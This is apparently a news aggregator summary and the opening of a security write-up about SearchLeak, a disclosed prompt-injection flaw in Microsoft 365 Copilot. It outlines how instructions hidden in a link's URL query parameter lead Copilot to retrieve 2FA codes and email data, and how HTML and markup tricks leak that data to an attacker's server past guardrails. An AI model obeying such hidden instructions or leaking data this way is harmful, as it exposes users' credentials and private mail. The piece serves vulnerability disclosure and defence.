Varonis Reveals M365 Copilot Exploit That Pulled 2FA Codes After Microsoft Patched Critical Flaw
Updated
Updated · Ars Technica · Jun 16
Varonis Reveals M365 Copilot Exploit That Pulled 2FA Codes After Microsoft Patched Critical Flaw
3 articles · Updated · Ars Technica · Jun 16
Summary
Varonis said its proof-of-concept exploit could extract 2FA codes and other sensitive email data accessible to M365 Copilot, a week after Microsoft patched the bug.
The attack abused a core LLM weakness: Copilot could not reliably separate legitimate user instructions from malicious commands hidden in third-party content it processed.
To evade guardrails blocking email sends, form submissions and visits to untrusted sites, the researchers used markup and HTML tricks that turned stolen data into web requests captured on an attacker-controlled server.
A key step was a "Parameter-to-Prompt Injection" that hid the malicious instruction in a URL's q query parameter rather than in an email or document, helping the exploit jump Copilot's existing defenses.
The disclosure underscores a broader problem for Microsoft and other LLM providers, which still rely on layered guardrails because the instruction boundary at the heart of prompt injection remains unresolved.
Will new laws like the EU AI Act be enough to prevent the next wave of sophisticated AI data breaches?
Is the fundamental 'gullibility' of AI a flaw we can ever truly patch, or an inherent risk we must simply manage?
When AI can autonomously form cartels, is human oversight the only real defense against its evolving risks?
SearchLeak (CVE-2026-42824): Anatomy and Impact of a Critical One-Click Data Theft Vulnerability in Microsoft 365 Copilot Enterprise Search
Overview
Varonis Threat Labs discovered SearchLeak (CVE-2026-42824), a critical vulnerability in Microsoft 365 Copilot Enterprise Search. This flaw exposes a broader risk in LLM-powered enterprise assistants that combine external inputs, like links or prompts, with internal data access and actions. Attackers can send a seemingly legitimate Microsoft link via email or messaging platforms. When the victim clicks the link, it launches Copilot Search with hidden instructions in the URL, allowing prompt injection and unauthorized data retrieval. Any system that allows prompt injection, data retrieval, and output rendering in the same flow could be vulnerable to similar attacks.